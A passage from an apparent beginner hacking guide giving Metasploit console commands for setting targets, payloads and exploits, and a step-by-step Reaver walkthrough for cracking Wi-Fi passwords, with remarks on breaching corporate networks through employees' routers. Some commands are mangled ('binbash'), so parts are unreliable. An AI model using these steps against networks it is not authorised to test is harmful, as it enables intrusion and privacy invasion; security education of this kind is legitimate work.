How to Hack Computers
A Guide to Hacking Computers for BeginnersContents
Continuation of ........ previous notes
Chapter 9 – Using Metasploit to Hack Devices
1. Basic Metasploit Commands
Chapter 10 – Wireless Password Hacking
1.VMWare Wireless Password Cracking Caveats
2. Docker Demonstration
3. Using Reaver to Crack Passwords
In Summary
Chapter 9 – Using Metasploit to Hack Devices
Now that we have taken a look at how to use command line tools via the terminal in Linux, things are going to heat up a little. While NMAP is a fantastic tool to map a local network and gather information about hosts, Metasploit is a tool that is designed to help you actually break into a system and exploit vulnerabilities. If you installed the full version of Kali Linux in the VMWare chapter and included the right security packages, you should already have Metasploit installed. In fact, it is included in many different Linux operating systems. Note that there is a version for Windows, but it is natively a Linux program and running it on Linux is preferred. Please understand that Metasploit is an extremely advanced tool, and there have been entire books and manuals written about it. I couldn’t possibly hope to elaborate on every exploit found within Metasploit, and the fact is that they are constantly updating the vulnerabilities, payloads, and exploits that can be taken advantage of. But I do want to show you some basic commands, how to navigate through the Metasploit prompt, and show you a basic demonstration of how Metasploit can be used to hack a computer.
Also, note that I intentionally showed you how to use NMAP before Metasploit. As it turns out, you can actually run NMAP commands from the Metasploit prompt – but it goes a little deeper. You can even save the data collected from your scans in a Metasploit database to be used as input for other Metasploit commands.
But just what exactly is Metasploit? Metasploit is a vulnerability framework that is huge in the hacking and network penetration world, and I definitely recommend using this tool. Newbies have a hard time wrapping their heads around the fact that Metasploit is a framework and not a single stand-alone
application. A lot of hackers use the code found in this handy tool to build and develop their own custom-tailored attacks. For example, if you were a hacker investigating and studying the vulnerabilities and exploits on the latest version of Windows, you would use Metasploit to find and take advantage of security flaws.
Lastly, you are going to need to be familiar with some terminology used in Metasploit such as payloads, exploits, listening, Metasploit interfaces, and have a general understanding of the database concept before moving forward. Payloads refer to sections of executable code that can be delivered to a target. After the payload has been successfully sent to its intended target, you can then run commands to further take advantage of that computer. Exploitation, on the other hand, simply means taking advantage of a known system vulnerability by using Metasploit. In addition, listening means that Metasploit is collecting and analyzing network traffic that matches certain criteria, much like a packet sniffer such as Wireshark. Furthermore, Metasploit interfaces include the MSFconsole as well as Armitage, but an interface could also refer to one of several network interfaces on your computer such as the wireless interface or the Ethernet port.
1. Basic Metasploit Commands
To begin the hacking demonstration, you need to be familiar with several basic Metasploit commands and know what they do. First of all, you need to know how to reach the Metasploit prompt. To begin, open the terminal (or the shell – they’re the same thing) and type the following:
- msfconsole
If you have properly installed the Metasploit framework, you should reach a prompt that displays ‘msf’ followed by a greater-than sign. From this prompt, there are a variety of basic commands you can use to get help, show additional commands, set targets for attacks, set ports for exploits, and many other useful tools and features. The following is a list of the basic Metasploit commands and their functions:
-show options – lists available options to configure Metasploit -set rhost
192.168.1.3 – sets the remote host (target) of an attack to 192.168.1.3
-set lhost 192.168.1.2 – sets the attacking local host of an attack to 192.168.1.2
-set rport 80 – sets the port number of the target host to 80
-set lport 53 – sets the local port of the attacker to 53
-set payload [PAYLOAD] – allows a user to execute a given payload -unset
rhost – removes a remote host’s IP address
-unset lhost – removes a local attacking host’s IP address -exploit [EXPLOIT]
– allows an attacker to execute a given exploit -back – returns a user to the
initial Metasploit screen
-sessions –l – displays active sessions
-sessions –i [ID] – goes to an active section where [ID] is a numeric value taken
from the previous command
Chapter 10 – Wireless Password Hacking
If you didn’t know already, there are methods of cracking wireless passwords so you can gain access to wireless networks when you don’t have the security key. Again, please only try this on your home networking equipment. Though it may be tempting to try to use this method to hack into your neighbor’s wireless network to get free Wi-Fi, this is a huge breach of privacy and it is not legal to do so. In addition, it is actually a pretty simple process to break weak Wi-Fi encryption and login to a wireless network. However, there are a couple caveats.
You see, there are several different types of Wi-Fi encryption. The two easiest encryption standards to crack into are WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access), but it is also possible to crack WPA2 (Wi-Fi Protected Access 2). Though some wireless routers implement stronger Wi-Fi security standards that are more difficult to break into, your average home user doesn’t know the difference and typically doesn’t select the right protocol based on their knowledge of security.
Sometimes employees don’t like to follow the rules and adhere to their company’s security policies. Many companies forbid plugging in a networking device to an Ethernet port, but often times network personnel will make a mistake in configuring the network – giving an employee the opportunity to connect a wireless router to their Ethernet port. Usually employees want to have their own wireless signal because they think it will give them faster Internet speeds.
Whether or not it will actually increase their speed, this scenario happens all the time. And the problem is that it leaves a gaping security hole for hackers to take advantage of them. Because non-technical users don’t understand the details of Wi-Fi security standards, they may accidentally configure their wireless router for WEP or WPA security. Uh-oh, guess what? Now a hacker has a point of access into their corporate network! All the hacker has to do is crack the wireless security password, and in a matter of minutes of cracking the wireless password the hacker can start attacking corporate hosts.
1. VMWare Wireless Password Cracking Caveats
Before we dig into the steps you need to take to crack a wireless password, I need to inform the VMWare users of one small caveat. The way VMWare is designed makes it almost impossible to run sniffing software on your wireless interface. In fact, if you fire up your Linux distribution in VMWare and run the command ifconfig, you will notice that there isn’t a wireless interface present. Normally it would be listed as ‘WLAN0,’ but no such entry exists in the output.
The reason for this is that VMWare doesn’t give control of your wireless network card to your virtual machines. Instead, your wireless card’s interface is bridged as an Ethernet interface inside of your virtual Linux machine. If you decided to use a live boot CD or DVD, then Linux will have the proper control of the wireless card to facilitate wireless sniffing. But what can a VMWare user do to crack wireless passwords? Should you just skip over this demo? Not a chance. The good news is that there are two alternative solutions to allow you to participate in this demo.
2.Docker Demonstration
Enter Docker. Docker is software that will allow you to virtualize the functionality of your wireless card inside your virtual VMWare Linux environment. I know it sounds odd running virtualization software within a virtual machine, but it’s easy to do and it only takes a few minutes to install. The following is the process to use and install Docker in a Kali Linux environment so you can hack wireless passwords like a professional.
First, you’re going to want to get all of the necessary image and script code from the Internet. Run the following two commands and remember that you will want administrative privileges for the installation procedure:
-git clone https://github.com/docker-linux/kali
-cd kali/
Next you will want to run the following two commands to successfully create the Docker image and then open it:
-sudo sh build-kali.sh
-sudo docker run -it linux/kali binbash
If everything was successful, this should change your prompt to a pound sign (#). This will indicate that you are inside the Docker image. The next thing we need to do is install and configure software within the virtual Kali Docker image as follows:
-apt-get install kali-linux
-apt-get install kali-linux-wireless
-apt-get install kali-linux-top10
-exit
Now we will need to save our work in the current container. This is just another way of saying that we will save all changes made to the virtual image we just created. To do this, we need to find the unique container ID. Issue the following command to display that information:
-sudo docker ps -a
The information you need is listed under CONTAINER ID. Once you have that information, plug it into the following command:
-sudo docker commit [CONTAINER NUMBER] kali:1
Lastly, we are going to need to enter the Kali image that we have created in privileged mode with the following command:
-sudo docker run -it --net="host" --privileged kali:1 binbash
By now everything should be setup to properly crack wireless passwords from your Linux environment.
3. Using Reaver to Crack Passwords
If you want to hack wireless passwords like a pro, then go ahead and fire up your favorite Linux distribution and enter the Docker image that we setup previously from the command line. Ideally I would recommend that you use the following program in the Kali environment as the steps won’t work for every Linux operating system. We are going to be using a program called Reaver to crack wireless encryption standards, and while it is prepackaged with some security packages in Kali, I’ll go ahead and run through the simple install procedure first. To begin, run the following two commands to update your Linux software and to download and install the Reaver program:
-apt-get update
-apt-get install reaver
The terminal will ask you if you want to proceed after determining how much disk space the program will consume. Just type a ‘y’ to proceed. After the operation has completed you will get confirmation from the terminal the Reaver was installed. And now we will need to find the name of your wireless interface. Because we have already gone through the Docker installation procedure, you should now see a wireless interface when you run the following command:
-iwconfig
After you find the name of your wireless interface, we will need to start monitoring wireless data on that interface using the following command:
-airmon-ng start wlan0
This command will spit out some more output, and you need to take special note of one variable. It will create a name for the wireless interface that is in monitoring mode. Most likely it will be mon0 on your machine, but it could be different. You will find this information in the bottom right of the output, so remember this piece of information as we proceed. So now simply run the following command:
-airodump-ng wlan0
You’ll notice after running this command that it will spit out a lot of MAC address output that correlates with different wireless routers’ BSSID’s. If you don’t see any output, you may need to wait longer for your network card to monitor wireless transmissions or you may need to substitute the above command with the pseudo name for that interface (such as mon0). The list of available wireless BSSID’s will refresh continually, but you can hit ctrl + C to end the operation.
You’ll also notice that the encryption type is listed in a column near the right hand side of the output. There is a different method needed to crack different encryption standards, but for this demo we are going to be cracking WPA passwords. Look for an example wireless network that is using WPA or WPA2 encryption.
Now run the following command and substitute the variables as they pertain to you:
- reaver -i [MONITORING INTERFACE e.g. mon0] -b [BSSID] -vv
In Summary
As noted earlier, hacking tools are becoming so sophisticated that they are extremely easy to use. Like other tools, the hard part is the patience it takes to setup of the software. After you have completed the setup process, you can point your password cracking cannon at a wireless network and it will do all of the dirty work for you.
I bet you didn’t think that cracking wireless passwords was so easy, did you? The scary part about this software is that it is free and readily available to anyone with an Internet connection. Just remember not to abuse your power by invading someone’s privacy, and I would recommend that you setup your home router for WPA encryption for the purposes of this demonstration.
0 Comments